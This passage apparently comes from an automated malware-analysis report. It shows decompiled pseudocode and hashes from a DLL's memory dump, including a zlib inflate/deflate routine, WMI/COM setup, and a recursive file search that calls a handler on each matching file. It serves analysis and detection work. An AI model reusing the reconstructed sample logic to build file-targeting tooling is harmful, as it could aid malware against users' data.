    												_t280 = 0;
    												_t350 = 0xb;
    											}
    											L101:
    											_t174 = _t435[0x16];
    											if(_t280 != 0) {
    												 *(_t174 + 0x18) = _t280;
    											}
    											 *((intOrPtr*)( *((intOrPtr*)(_t174 + 0x1c)))) = _t350;
    											goto L104;
    										}
    										_t173 =  *(_t435[2] + (((0x00000001 << _t311) - 0x00000001 & _t431) + _t356) * 4);
    										continue;
    									}
    									_t312 = _t311 & 0x0000000f;
    									if(_t312 != 0) {
    										if(_t253 < _t312) {
    											asm("lodsw");
    											_t339 = _t253;
    											_t253 = _t253 + 0x10;
    											_t431 = _t431 | 0 << _t339;
    											_t312 = _t339;
    										}
    										_t253 = _t253 - _t312;
    										_t235 = (0x00000001 << _t312) - 0x00000001 & _t431;
    										_t431 = _t431 >> _t312;
    										_t356 = _t356 + _t235;
    									}
    									_t435[6] = _t356;
    									if(_t253 <= 0xf) {
    										asm("lodsw");
    										_t337 = _t253;
    										_t253 = _t253 + 0x10;
    										_t431 = _t431 | 0 << _t337;
    									}
    									_t200 =  *(_t435[3] + (_t435[1] & _t431) * 4);
    									while(1) {
    										_t361 = _t200 >> 0x10;
    										_t253 = _t253 - _t200;
    										_t431 = _t431 >> _t200;
    										_t315 = _t200;
    										if((_t200 & 0x00000010) != 0) {
    											break;
    										}
    										if((_t200 & 0x00000040) != 0) {
    											L96:
    											_t280 = "invalid distance code";
    											_t350 = 0x1a;
    											goto L101;
    										}
    										_t200 =  *(_t435[3] + (((0x00000001 << _t315) - 0x00000001 & _t431) + _t361) * 4);
    									}
    									_t316 = _t315 & 0x0000000f;
    									if(_t316 == 0) {
    										if(_t361 != 1 || _t435[0xa] == _t368) {
    											L38:
    											_t435[0xb] = _t396;
    											_t207 = _t368 - _t435[0xa];
    											if(_t207 < _t361) {
    												_t208 = _t435[0xd];
    												_t318 =  ~_t207;
    												_t414 = _t435[0xe];
    												if(_t208 < _t361) {
    													L100:
    													_t396 = _t435[0xb];
    													_t280 = "invalid distance too far back";
    													_t350 = 0x1a;
    													goto L101;
    												}
    												_t319 = _t318 + _t361;
    												if(_t435[0xc] != 0) {
    													_t209 = _t435[0xc];
    													if(_t319 <= _t209) {
    														_t416 = _t414 + _t209 - _t319;
    														_t210 = _t435[6];
    														if(_t210 > _t319) {
    															_t210 = memcpy(_t368, _t416, _t319);
    															_t435 =  &(_t435[3]);
    															_t368 = _t416 + _t319 + _t319;
    															_t416 = _t368 - _t361;
    														}
    													} else {
    														_t416 = _t414 + _t435[0xd] + _t209 - _t319;
    														_t324 = _t319 - _t209;
    														_t210 = _t435[6];
    														if(_t210 > _t324) {
    															_t210 = memcpy(_t368, _t416, _t324);
    															_t435 =  &(_t435[3]);
    															_t368 = _t416 + _t324 + _t324;
    															_t416 = _t435[0xe];
    															_t326 = _t435[0xc];
    															if(_t210 > _t326) {
    																_t210 = memcpy(_t368, _t416, _t326);
    																_t435 =  &(_t435[3]);
    																_t368 = _t416 + _t326 + _t326;
    																_t416 = _t368 - _t361;
    															}
    														}
    													}
    												} else {
    													_t416 = _t414 + _t208 - _t319;
    													_t210 = _t435[6];
    													if(_t210 > _t319) {
    														_t210 = memcpy(_t368, _t416, _t319);
    														_t435 =  &(_t435[3]);
    														_t368 = _t416 + _t319 + _t319;
    														_t416 = _t368 - _t361;
    													}
    												}
    												_t320 = _t210;
    												memcpy(_t368, _t416, _t320);
    												_t435 =  &(_t435[3]);
    												_t368 = _t416 + _t320 + _t320;
    												_t396 = _t435[0xb];
    												goto L22;
    											}
    											_t423 = _t368 - _t361;
    											_t330 = _t435[6] - 3;
    											 *_t368 =  *_t423;
    											_t424 = _t423 + 3;
    											 *((char*)(_t368 + 1)) =  *((intOrPtr*)(_t423 + 1));
    											 *((char*)(_t368 + 2)) =  *((intOrPtr*)(_t423 + 2));
    											memcpy(_t368 + 3, _t424, _t330);
    											_t435 =  &(_t435[3]);
    											_t368 = _t424 + _t330 + _t330;
    											_t396 = _t435[0xb];
    										} else {
    											_t389 = _t368 - 1;
    											_t222 =  *_t389;
    											_t333 = _t435[6] - 3;
    											 *(_t389 + 1) = _t222;
    											 *(_t389 + 2) = _t222;
    											 *(_t389 + 3) = _t222;
    											_t390 = _t389 + 4;
    											memset(_t390, _t222, _t333 << 0);
    											_t435 =  &(_t435[3]);
    											_t368 = _t390 + _t333;
    										}
    										goto L22;
    									}
    									if(_t253 < _t316) {
    										asm("lodsw");
    										_t336 = _t253;
    										_t253 = _t253 + 0x10;
    										_t431 = _t431 | 0 << _t336;
    										_t316 = _t336;
    									}
    									_t253 = _t253 - _t316;
    									_t227 = (0x00000001 << _t316) - 0x00000001 & _t431;
    									_t431 = _t431 >> _t316;
    									_t361 = _t361 + _t227;
    									goto L38;
    								}
    								L22:
    							} while (_t435[4] > _t368 && _t435[5] > _t396);
    							L104:
    							if( *0x1001d040 == 2) {
    								_t253 = _t431;
    							}
    							_t176 = _t435[0x16];
    							_t351 =  *((intOrPtr*)(_t176 + 0x1c));
    							_t282 = _t253 >> 3;
    							_t397 = _t396 - _t282;
    							_t254 = _t253 - (_t282 << 3);
    							 *(_t176 + 0xc) = _t368;
    							 *(_t351 + 0x3c) = _t254;
    							_t284 = _t254;
    							_t255 =  &(_t435[7]);
    							if(_t435[5] == _t255) {
    								_t266 =  *_t176;
    								_t435[5] = _t266;
    								_t397 = _t397 - _t255 + _t266;
    								_t435[5] = _t435[5] +  *((intOrPtr*)(_t176 + 4)) - 0xb;
    							}
    							 *_t176 = _t397;
    							_t258 = (1 << _t284) - 1;
    							if( *0x1001d040 == 2) {
    								asm("psrlq mm0, mm1");
    								asm("movd ebp, mm0");
    								asm("emms");
    							}
    							 *(_t351 + 0x38) = _t431 & _t258;
    							_t259 = _t435[5];
    							if(_t259 <= _t397) {
    								 *((intOrPtr*)(_t176 + 4)) =  ~(_t397 - _t259) + 0xb;
    							} else {
    								 *((intOrPtr*)(_t176 + 4)) = _t259 - _t397 + 0xb;
    							}
    							_t260 = _t435[4];
    							if(_t260 <= _t368) {
    								 *((intOrPtr*)(_t176 + 0x10)) =  ~(_t368 - _t260) + 0x101;
    							} else {
    								 *((intOrPtr*)(_t176 + 0x10)) = _t260 - _t368 + 0x101;
    							}
    							asm("popfd");
    							return _t176;
    						}
    						_push(_t172);
    						_push(_t252);
    						_push(_t278);
    						_push(_t347);
    						asm("pushfd");
    						 *_t435 =  *_t435 ^ 0x00200000;
    						asm("popfd");
    						asm("pushfd");
    						_pop(_t364);
    						_t365 = _t364 ^  *_t435;
    						if(_t365 == 0) {
    							L15:
    							 *0x1001d040 = 3;
    							L16:
    							_pop(_t347);
    							_pop(_t278);
    							_pop(_t252);
    							_pop(_t172);
    							continue;
    						}
    						asm("cpuid");
    						if(_t252 != 0x756e6547 || _t278 != 0x6c65746e || _t365 != 0x49656e69) {
    							goto L15;
    						} else {
    							asm("cpuid");
    							if(0xd != 6 || (_t365 & 0x00800000) == 0) {
    								goto L15;
    							} else {
    								 *0x1001d040 = 2;
    								goto L16;
    							}
    						}
    					}
    					asm("emms");
    					asm("movd mm0, ebp");
    					_t431 = _t252;
    					asm("movd mm4, dword [esp]");
    					asm("movq mm3, mm4");
    					asm("movd mm5, dword [esp+0x4]");
    					asm("movq mm2, mm5");
    					asm("pxor mm1, mm1");
    					_t253 = _t435[2];
    					do {
    						asm("psrlq mm0, mm1");
    						if(_t431 <= 0x20) {
    							asm("movd mm6, ebp");
    							asm("movd mm7, dword [esi]");
    							_t396 = _t396 + 4;
    							asm("psllq mm7, mm6");
    							_t431 = _t431 + 0x20;
    							asm("por mm0, mm7");
    						}
    						asm("pand mm4, mm0");
    						asm("movd eax, mm4");
    						asm("movq mm4, mm3");
    						_t173 =  *(_t253 + _t172 * 4);
    						while(1) {
    							_t279 = _t173 & 0x000000ff;
    							asm("movd mm1, ecx");
    							_t431 = _t431 - _t279;
    							if(_t173 == 0) {
    								break;
    							}
    							_t349 = _t173 >> 0x10;
    							if((_t173 & 0x00000010) == 0) {
    								if((_t173 & 0x00000040) != 0) {
    									goto L97;
    								}
    								asm("psrlq mm0, mm1");
    								asm("movd ecx, mm0");
    								_t173 =  *(_t253 + ((_t279 &  *(0x1001530c + (_t173 & 0x0000000f) * 4)) + _t349) * 4);
    								continue;
    							}
    							_t178 = _t173 & 0x0000000f;
    							if(_t178 != 0) {
    								asm("psrlq mm0, mm1");
    								asm("movd mm1, eax");
    								asm("movd ecx, mm0");
    								_t431 = _t431 - _t178;
    								_t349 = _t349 + (_t279 &  *(0x1001530c + _t178 * 4));
    							}
    							asm("psrlq mm0, mm1");
    							if(_t431 <= 0x20) {
    								asm("movd mm6, ebp");
    								asm("movd mm7, dword [esi]");
    								_t396 = _t396 + 4;
    								asm("psllq mm7, mm6");
    								_t431 = _t431 + 0x20;
    								asm("por mm0, mm7");
    							}
    							asm("pand mm5, mm0");
    							asm("movd eax, mm5");
    							asm("movq mm5, mm2");
    							_t179 =  *(_t435[3] + _t178 * 4);
    							while(1) {
    								_t287 = _t179 & 0x000000ff;
    								_t253 = _t179 >> 0x10;
    								_t431 = _t431 - _t287;
    								asm("movd mm1, ecx");
    								if((_t179 & 0x00000010) != 0) {
    									break;
    								}
    								if((_t179 & 0x00000040) != 0) {
    									goto L96;
    								}
    								asm("psrlq mm0, mm1");
    								asm("movd ecx, mm0");
    								_t179 =  *(_t435[3] + ((_t287 &  *(0x1001530c + (_t179 & 0x0000000f) * 4)) + _t253) * 4);
    							}
    							_t182 = _t179 & 0x0000000f;
    							if(_t182 == 0) {
    								if(_t253 != 1 || _t435[0xa] == _t368) {
    									L76:
    									_t435[0xb] = _t396;
    									_t184 = _t368 - _t435[0xa];
    									if(_t184 < _t253) {
    										_t185 = _t435[0xd];
    										_t291 =  ~_t184;
    										_t403 = _t435[0xe];
    										if(_t185 < _t253) {
    											goto L100;
    										}
    										_t292 = _t291 + _t253;
    										if(_t435[0xc] != 0) {
    											_t186 = _t435[0xc];
    											if(_t292 <= _t186) {
    												_t405 = _t403 + _t186 - _t292;
    												if(_t349 > _t292) {
    													_t349 = _t349 - _t292;
    													memcpy(_t368, _t405, _t292);
    													_t435 =  &(_t435[3]);
    													_t368 = _t405 + _t292 + _t292;
    													_t405 = _t368 - _t253;
    												}
    											} else {
    												_t405 = _t403 + _t435[0xd] + _t186 - _t292;
    												_t296 = _t292 - _t186;
    												if(_t349 > _t296) {
    													_t349 = _t349 - _t296;
    													memcpy(_t368, _t405, _t296);
    													_t435 =  &(_t435[3]);
    													_t368 = _t405 + _t296 + _t296;
    													_t405 = _t435[0xe];
    													_t298 = _t435[0xc];
    													if(_t349 > _t298) {
    														_t349 = _t349 - _t298;
    														memcpy(_t368, _t405, _t298);
    														_t435 =  &(_t435[3]);
    														_t368 = _t405 + _t298 + _t298;
    														_t405 = _t368 - _t253;
    													}
    												}
    											}
    										} else {
    											_t405 = _t403 + _t185 - _t292;
    											if(_t349 > _t292) {
    												_t349 = _t349 - _t292;
    												memcpy(_t368, _t405, _t292);
    												_t435 =  &(_t435[3]);
    												_t368 = _t405 + _t292 + _t292;
    												_t405 = _t368 - _t253;
    											}
    										}
    										_t293 = _t349;
    										_t172 = memcpy(_t368, _t405, _t293);
    										_t435 =  &(_t435[3]);
    										_t368 = _t405 + _t293 + _t293;
    										_t396 = _t435[0xb];
    										_t253 = _t435[2];
    										goto L64;
    									}
    									_t412 = _t368 - _t253;
    									_t302 = _t349 - 3;
    									 *_t368 =  *_t412;
    									_t413 = _t412 + 3;
    									 *((char*)(_t368 + 1)) =  *((intOrPtr*)(_t412 + 1));
    									 *((char*)(_t368 + 2)) =  *((intOrPtr*)(_t412 + 2));
    									_t172 = memcpy(_t368 + 3, _t413, _t302);
    									_t435 =  &(_t435[3]);
    									_t368 = _t413 + _t302 + _t302;
    									_t396 = _t435[0xb];
    									_t253 = _t435[2];
    									goto L64;
    								} else {
    									_t380 = _t368 - 1;
    									_t194 =  *_t380;
    									_t305 = _t349 - 3;
    									 *(_t380 + 1) = _t194;
    									 *(_t380 + 2) = _t194;
    									 *(_t380 + 3) = _t194;
    									_t381 = _t380 + 4;
    									_t172 = memset(_t381, _t194, _t305 << 0);
    									_t435 =  &(_t435[3]);
    									_t368 = _t381 + _t305;
    									_t253 = _t435[2];
    									L64:
    									if(_t435[4] <= _t368) {
    										goto L104;
    									}
    									goto L65;
    								}
    							}
    							asm("psrlq mm0, mm1");
    							asm("movd mm1, eax");
    							asm("movd ecx, mm0");
    							_t431 = _t431 - _t182;
    							_t253 = _t253 + (_t287 &  *(0x1001530c + _t182 * 4));
    							goto L76;
    						}
    						_t172 = _t173 >> 0x10;
    						asm("stosb");
    						goto L64;
    						L65:
    					} while (_t435[5] > _t396);
    					goto L104;
    				}
    			}

    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.697052949.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true
    • Associated: 00000000.00000002.697045177.0000000010000000.00000002.00020000.sdmp Download File
    Similarity
    • API ID:
    • String ID: Genu$ineI$invalid distance code$invalid distance too far back$invalid literal/length code$ntel
    • API String ID: 0-3089872807
    • Opcode ID: 06c06f8f757cebf00b6328368a045d6cb72c8d0c19ae02dd583fa473f6032e91
    • Instruction ID: df573eda0294624fdf6872f86a3b68269dceab1b823458b8d2ff77a7191766b5
    • Opcode Fuzzy Hash: 06c06f8f757cebf00b6328368a045d6cb72c8d0c19ae02dd583fa473f6032e91
    • Instruction Fuzzy Hash: F7121731A08752CFD715DE38C49020AB7E2EB88396F59862DE895DFB41D376DD88CB81
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 30%
    			E1000D52E(void* __ecx) {
    				char _v8;
    				void* _v12;
    				char* _t15;
    				intOrPtr* _t16;
    				void* _t21;
    				intOrPtr* _t23;
    				intOrPtr* _t24;
    				intOrPtr* _t25;
    				void* _t30;
    				void* _t33;
    
    				_v12 = 0;
    				_v8 = 0;
    				__imp__CoInitializeEx(0, 0, _t30, _t33, __ecx, __ecx);
    				__imp__CoInitializeSecurity(0, 0xffffffff, 0, 0, 0, 3, 0, 0, 0);
    				_t15 =  &_v12;
    				__imp__CoCreateInstance(0x1001b840, 0, 1, 0x1001b850, _t15);
    				if(_t15 < 0) {
    					L5:
    					_t23 = _v8;
    					if(_t23 != 0) {
    						 *((intOrPtr*)( *_t23 + 8))(_t23);
    					}
    					_t24 = _v12;
    					if(_t24 != 0) {
    						 *((intOrPtr*)( *_t24 + 8))(_t24);
    					}
    					_t16 = 0;
    				} else {
    					__imp__#2(__ecx);
    					_t25 = _v12;
    					_t21 =  *((intOrPtr*)( *_t25 + 0xc))(_t25, _t15, 0, 0, 0, 0, 0, 0,  &_v8);
    					if(_t21 < 0) {
    						goto L5;
    					} else {
    						__imp__CoSetProxyBlanket(_v8, 0xa, 0, 0, 3, 3, 0, 0);
    						if(_t21 < 0) {
    							goto L5;
    						} else {
    							_t16 = E100085EA(8);
    							if(_t16 == 0) {
    								goto L5;
    							} else {
    								 *((intOrPtr*)(_t16 + 4)) = _v12;
    								 *_t16 = _v8;
    							}
    						}
    					}
    				}
    				return _t16;
    			}

    APIs
    • CoInitializeEx.OLE32(00000000,00000000,00000000,?,00000000,00000000,?,1000D82E,00000C5B,00000000,?,00000000), ref: 1000D541
    • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000,?,1000D82E,00000C5B,00000000,?,00000000), ref: 1000D552
    • CoCreateInstance.OLE32(1001B840,00000000,00000001,1001B850,?,?,1000D82E,00000C5B,00000000,?,00000000), ref: 1000D569
    • SysAllocString.OLEAUT32(00000000), ref: 1000D574
    • CoSetProxyBlanket.OLE32(00000000,0000000A,00000000,00000000,00000003,00000003,00000000,00000000,?,1000D82E,00000C5B,00000000,?,00000000), ref: 1000D59F
      • Part of subcall function 100085EA: HeapAlloc.KERNEL32(00000008,?,?,10008F6A,00000100,?,10005FA8), ref: 100085F8
    Memory Dump Source
    • Source File: 00000000.00000002.697052949.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true
    • Associated: 00000000.00000002.697045177.0000000010000000.00000002.00020000.sdmp Download File
    Similarity
    • API ID: AllocInitialize$BlanketCreateHeapInstanceProxySecurityString
    • String ID:
    • API String ID: 2855449287-0
    • Opcode ID: f30b641bcf0aa0fe1c904c3557c566646e3f16f6a2450ffed76bd1eba4bc5383
    • Instruction ID: f9fb2e14203abb558b51dae657c8012b2cf373e276ee73c0d93c46e05e0496eb
    • Opcode Fuzzy Hash: f30b641bcf0aa0fe1c904c3557c566646e3f16f6a2450ffed76bd1eba4bc5383
    • Instruction Fuzzy Hash: A821E471600255BBEB249B62CC4DE6FBFBCEFC6B55F11415DB906AA290CA70DA41CA30
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 78%
    			E1000AE9A(void* __ecx, void* __fp0, intOrPtr _a16) {
    				char _v12;
    				WCHAR* _v16;
    				short _v560;
    				short _v562;
    				struct _WIN32_FIND_DATAW _v608;
    				WCHAR* _t27;
    				void* _t31;
    				int _t36;
    				intOrPtr _t37;
    				intOrPtr _t44;
    				void* _t48;
    				intOrPtr _t49;
    				void* _t51;
    				intOrPtr _t56;
    				void* _t61;
    				char _t62;
    				void* _t63;
    				void* _t64;
    				void* _t65;
    				void* _t80;
    
    				_t80 = __fp0;
    				_push(0);
    				_t51 = __ecx;
    				_push(L"\\*");
    				_t27 = E100092CB(__ecx);
    				_t65 = _t64 + 0xc;
    				_v16 = _t27;
    				if(_t27 == 0) {
    					return _t27;
    				}
    				_t61 = FindFirstFileW(_t27,  &_v608);
    				if(_t61 == 0xffffffff) {
    					L18:
    					return E10008600( &_v16, 0xfffffffe);
    				}
    				_t31 = 0x2e;
    				do {
    					if(_v608.cFileName != _t31 || _v562 != 0 && (_v562 != _t31 || _v560 != 0)) {
    						if((_v608.dwFileAttributes & 0x00000010) != 0) {
    							L14:
    							_push(0);
    							_push( &(_v608.cFileName));
    							_push("\\");
    							_t62 = E100092CB(_t51);
    							_t65 = _t65 + 0x10;
    							_v12 = _t62;
    							if(_t62 != 0) {
    								_t56 =  *0x1001e684; // 0x306f878
    								 *((intOrPtr*)(_t56 + 0xb4))(1);
    								_push(1);
    								_push(1);
    								_push(0);
    								E1000AE9A(_t62, _t80, 1, 5, E1000EFB5, _a16);
    								_t65 = _t65 + 0x1c;
    								E10008600( &_v12, 0xfffffffe);
    							}
    							goto L16;
    						}
    						_t63 = 0;
    						do {
    							_t10 = _t63 + 0x1001e78c; // 0x0
    							_push( *_t10);
    							_push( &(_v608.cFileName));
    							_t44 =  *0x1001e690; // 0x306fb18
    							if( *((intOrPtr*)(_t44 + 0x18))() == 0) {
    								goto L12;
    							}
    							_t48 = E1000EFB5(_t80, _t51,  &_v608, _a16);
    							_t65 = _t65 + 0xc;
    							if(_t48 == 0) {
    								break;
    							}
    							_t49 =  *0x1001e684; // 0x306f878
    							 *((intOrPtr*)(_t49 + 0xb4))(1);
    							L12:
    							_t63 = _t63 + 4;
    						} while (_t63 < 4);
    						if((_v608.dwFileAttributes & 0x00000010) == 0) {
    							goto L16;
    						}
    						goto L14;
    					}
    					L16:
    					_t36 = FindNextFileW(_t61,  &_v608);
    					_t31 = 0x2e;
    				} while (_t36 != 0);
    				_t37 =  *0x1001e684; // 0x306f878
    				 *((intOrPtr*)(_t37 + 0x78))(_t61);
    				goto L18;
    			}

    APIs
    • FindFirstFileW.KERNEL32(00000000,?,00000000,00000000,?), ref: 1000AECB
    • FindNextFileW.KERNEL32(00000000,?), ref: 1000AFCC
    Memory Dump Source
    • Source File: 00000000.00000002.697052949.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true
    • Associated: 00000000.00000002.697045177.0000000010000000.00000002.00020000.sdmp Download File
    Similarity
    • API ID: FileFind$FirstNext
    • String ID:
    • API String ID: 1690352074-0
    • Opcode ID: ccf32ac4a9f5a782a5e194b7ff0c809da3928f0d5b0b92b1d1419007f1e5e171
    • Instruction ID: 187bc6246b44e78c00983fbb8b3d073dc18552681f4b71f7fcb5beed15ff1c60
    • Opcode Fuzzy Hash: ccf32ac4a9f5a782a5e194b7ff0c809da3928f0d5b0b92b1d1419007f1e5e171
    • Instruction Fuzzy Hash: 6231C271E0021A6AFB10DBE4DC89FAA73A8EB057D0F1102A5F605AA1D5E771DEC0CB55
    Uniqueness

    Uniqueness Score: -1.00%

    APIs
    • GetSystemTimeAsFileTime.KERNEL32(?,?,10005F8C), ref: 100097FF
    Memory Dump Source
    • Source File: 00000000.00000002.697052949.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true
    • Associated: 00000000.00000002.697045177.0000000010000000.00000002.00020000.sdmp Download File
    Similarity
    • API ID: Time$FileSystem
    • String ID:
    • API String ID: 2086374402-0
    • Opcode ID: 6d43f392a9e5e6da40ccce35754df6dc923eb91be77840cb2dd00ce09bfb791b
    • Instruction ID: b389187439d6018aa84707da5f063cbd2e4e48121c1f2061a12694a54993187a
    • Opcode Fuzzy Hash: 6d43f392a9e5e6da40ccce35754df6dc923eb91be77840cb2dd00ce09bfb791b
    • Instruction Fuzzy Hash: EDE04FBA9003186FD710EFA8DD46BAABBFDEB84A50F118554AC85B7348E570EE048790
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 99%
    			E10016EC0(intOrPtr _a4, signed int _a8, signed int _a12) {
    				signed int _v8;
    				signed short* _v12;
    				char _v16;
    				signed short _v20;
    				unsigned int _v24;
    				signed short _v28;
    				signed int _t223;
    				signed int _t235;
    				signed int _t237;
    				signed short _t240;
    				signed int _t241;
    				signed short _t244;
    				signed int _t245;
    				signed short _t248;
    				signed int _t249;
    				signed int _t250;
    				void* _t254;
    				signed char _t259;
    				signed int _t275;
    				signed int _t289;
    				signed int _t308;
    				signed short _t316;
    				signed int _t321;
    				void* _t329;
    				signed short _t330;
    				signed short _t333;
    				signed short _t334;
    				signed short _t343;
    				signed short _t346;
    				signed short _t347;
    				signed short _t348;
    				signed short _t358;
    				signed short _t361;
    				signed short _t362;
    				signed short _t363;
    				signed short _t370;
    				signed int _t373;
    				signed int _t378;
    				signed short _t379;
    				signed short _t382;
    				unsigned int _t388;
    				unsigned short _t390;
    				unsigned short _t392;
    				unsigned short _t394;
    				signed int _t396;
    				signed int _t397;
    				signed int _t398;
    				signed int _t400;
    				signed short _t401;
    				signed int _t402;
    				signed int _t403;
    				signed int _t407;
    				signed int _t409;
    
    				_t223 = _a8;
    				_t235 =  *(_t223 + 2) & 0x0000ffff;
    				_push(_t397);
    				_t388 = 0;
    				_t398 = _t397 | 0xffffffff;
    				if(_a12 < 0) {
    					L42:
    					return _t223;
    				} else {
    					_t329 =  !=  ? 7 : 0x8a;
    					_v12 = _t223 + 6;
    					_t254 = (0 | _t235 != 0x00000000) + 3;
    					_v16 = _a12 + 1;
    					do {
    						_v24 = _t388;
    						_t388 = _t388 + 1;
    						_a8 = _t235;
    						_a12 = _t235;
    						_v8 =  *_v12 & 0x0000ffff;
    						_t223 = _a4;
    						if(_t388 >= _t329) {
    							L4:
    							if(_t388 >= _t254) {
    								if(_a8 == 0) {
    									_t122 = _t223 + 0x16bc; // 0x8b3c7e89
    									_t400 =  *_t122;
    									if(_t388 > 0xa) {
    										_t168 = _t223 + 0xac4; // 0x5dc03300
    										_t330 =  *_t168 & 0x0000ffff;
    										_t169 = _t223 + 0xac6; // 0x55c35dc0
    										_t237 =  *_t169 & 0x0000ffff;
    										_v24 = _t330;
    										_t171 = _t223 + 0x16b8; // 0xfffffe8b
    										_t333 = (_t330 << _t400 |  *_t171) & 0x0000ffff;
    										_v28 = _t333;
    										if(_t400 <= 0x10 - _t237) {
    											_t259 = _t400 + _t237;
    										} else {
    											_t173 = _t223 + 0x14; // 0xc703f045
    											 *(_t223 + 0x16b8) = _t333;
    											_t175 = _t223 + 8; // 0x8d000040
    											 *((char*)( *_t175 +  *_t173)) = _v28;
    											_t223 = _a4;
    											 *((intOrPtr*)(_t223 + 0x14)) =  *((intOrPtr*)(_t223 + 0x14)) + 1;
    											_t181 = _t223 + 0x14; // 0xc703f045
    											_t182 = _t223 + 8; // 0x8d000040
    											_t183 = _t223 + 0x16b9; // 0x89fffffe
    											 *((char*)( *_t181 +  *_t182)) =  *_t183;
    											 *((intOrPtr*)(_t223 + 0x14)) =  *((intOrPtr*)(_t223 + 0x14)) + 1;
    											_t333 = _v24 >> 0x10;
    											_t189 = _t223 + 0x16bc; // 0x8b3c7e89
    											_t259 =  *_t189 + 0xfffffff0 + _t237;
    										}
    										_t334 = _t333 & 0x0000ffff;
    										 *(_t223 + 0x16bc) = _t259;
    										 *(_t223 + 0x16b8) = _t334;
    										_t401 = _t334 & 0x0000ffff;
    										if(_t259 <= 9) {
    											_t209 = _t388 - 0xb; // -10
    											 *(_t223 + 0x16b8) = _t209 << _t259 | _t401;
    											 *(_t223 + 0x16bc) = _t259 + 7;
    										} else {
    											_t193 = _t223 + 8; // 0x8d000040
    											_t390 = _t388 + 0xfffffff5;
    											_t194 = _t223 + 0x14; // 0xc703f045
    											_t240 = _t390 << _t259 | _t401;
    											 *(_t223 + 0x16b8) = _t240;
    											 *( *_t193 +  *_t194) = _t240;
    											 *((intOrPtr*)(_t223 + 0x14)) =  *((intOrPtr*)(_t223 + 0x14)) + 1;
    											_t199 = _t223 + 0x14; // 0xc703f045
    											_t200 = _t223 + 8; // 0x8d000040
    											_t201 = _t223 + 0x16b9; // 0x89fffffe
    											 *((char*)( *_t199 +  *_t200)) =  *_t201;
    											 *((intOrPtr*)(_t223 + 0x14)) =  *((intOrPtr*)(_t223 + 0x14)) + 1;
    											 *(_t223 + 0x16bc) =  *(_t223 + 0x16bc) + 0xfffffff7;
    											 *(_t223 + 0x16b8) = _t390 >> 0x10;
    										}
    										goto L35;
    									}
    									_t123 = _t223 + 0xac0; // 0x4e9
    									_t343 =  *_t123 & 0x0000ffff;
    									_t124 = _t223 + 0xac2; // 0x33000000
    									_t241 =  *_t124 & 0x0000ffff;
    									_v24 = _t343;
    									_t126 = _t223 + 0x16b8; // 0xfffffe8b
    									_t346 = (_t343 << _t400 |  *_t126) & 0x0000ffff;
    									_v28 = _t346;
    									if(_t400 > 0x10 - _t241) {
    										_t128 = _t223 + 0x14; // 0xc703f045
    										 *(_t223 + 0x16b8) = _t346;
    										_t130 = _t223 + 8; // 0x8d000040
    										 *((char*)( *_t130 +  *_t128)) = _v28;
    										_t223 = _a4;
    										 *((intOrPtr*)(_t223 + 0x14)) =  *((intOrPtr*)(_t223 + 0x14)) + 1;
    										_t136 = _t223 + 0x14; // 0xc703f045
    										_t137 = _t223 + 8; // 0x8d000040
    										_t138 = _t223 + 0x16b9; // 0x89fffffe
    										 *((char*)( *_t136 +  *_t137)) =  *_t138;
    										_t142 = _t223 + 0x16bc; // 0x8b3c7e89
    										 *((intOrPtr*)(_t223 + 0x14)) =  *((intOrPtr*)(_t223 + 0x14)) + 1;
    										_t346 = _v24 >> 0x10;
    										_t400 =  *_t142 + 0xfffffff0;
    									}
    									_t403 = _t400 + _t241;
    									_t347 = _t346 & 0x0000ffff;
    									 *(_t223 + 0x16bc) = _t403;
    									 *(_t223 + 0x16b8) = _t347;
    									_t348 = _t347 & 0x0000ffff;
    									if(_t403 <= 0xd) {
    										_t163 = _t403 + 3; // 0x8b3c7e8c
    										_t275 = _t163;
    										L28:
    										 *(_t223 + 0x16bc) = _t275;
    										_t165 = _t388 - 3; // -2
    										_t166 = _t223 + 0x16b8; // 0xfffffe8b
    										 *(_t223 + 0x16b8) = (_t165 << _t403 |  *_t166 & 0x0000ffff) & 0x0000ffff;
    									} else {
    										_t392 = _t388 + 0xfffffffd;
    										_t147 = _t223 + 0x14; // 0xc703f045
    										_t244 = _t392 << _t403 | _t348;
    										_t148 = _t223 + 8; // 0x8d000040
    										 *(_t223 + 0x16b8) = _t244;
    										 *( *_t148 +  *_t147) = _t244;
    										 *((intOrPtr*)(_t223 + 0x14)) =  *((intOrPtr*)(_t223 + 0x14)) + 1;
    										_t153 = _t223 + 0x14; // 0xc703f045
    										_t154 = _t223 + 8; // 0x8d000040
    										_t155 = _t223 + 0x16b9; // 0x89fffffe
    										 *((char*)( *_t153 +  *_t154)) =  *_t155;
    										 *((intOrPtr*)(_t223 + 0x14)) =  *((intOrPtr*)(_t223 + 0x14)) + 1;
    										 *(_t223 + 0x16bc) =  *(_t223 + 0x16bc) + 0xfffffff3;
    										 *(_t223 + 0x16b8) = _t392 >> 0x00000010 & 0x0000ffff;
    									}
    									goto L35;
    								}
    								_t289 = _a12;
    								if(_t289 != _t398) {
    									_t53 = _t289 * 4; // 0x238830a
    									_t396 =  *(_t223 + _t53 + 0xa7e) & 0x0000ffff;
    									_t56 = _t235 * 4; // 0x830a74c0
    									_t370 =  *(_t223 + _t56 + 0xa7c) & 0x0000ffff;
    									_t58 = _t223 + 0x16bc; // 0x8b3c7e89
    									_t407 =  *_t58;
    									_v28 = _t370;
    									_t60 = _t223 + 0x16b8; // 0xfffffe8b
    									_t249 = (_t370 << _t407 |  *_t60) & 0x0000ffff;
    									if(_t407 <= 0x10 - _t396) {
    										_t373 = _t249;
    										_t308 = _t407 + _t396;
    									} else {
    										_t61 = _t223 + 0x14; // 0xc703f045
    										_t62 = _t223 + 8; // 0x8d000040
    										 *(_t223 + 0x16b8) = _t249;
    										 *( *_t62 +  *_t61) = _t249;
    										 *((intOrPtr*)(_t223 + 0x14)) =  *((intOrPtr*)(_t223 + 0x14)) + 1;
    										_t67 = _t223 + 0x14; // 0xc703f045
    										_t68 = _t223 + 8; // 0x8d000040
    										_t69 = _t223 + 0x16b9; // 0x89fffffe
    										 *((char*)( *_t67 +  *_t68)) =  *_t69;
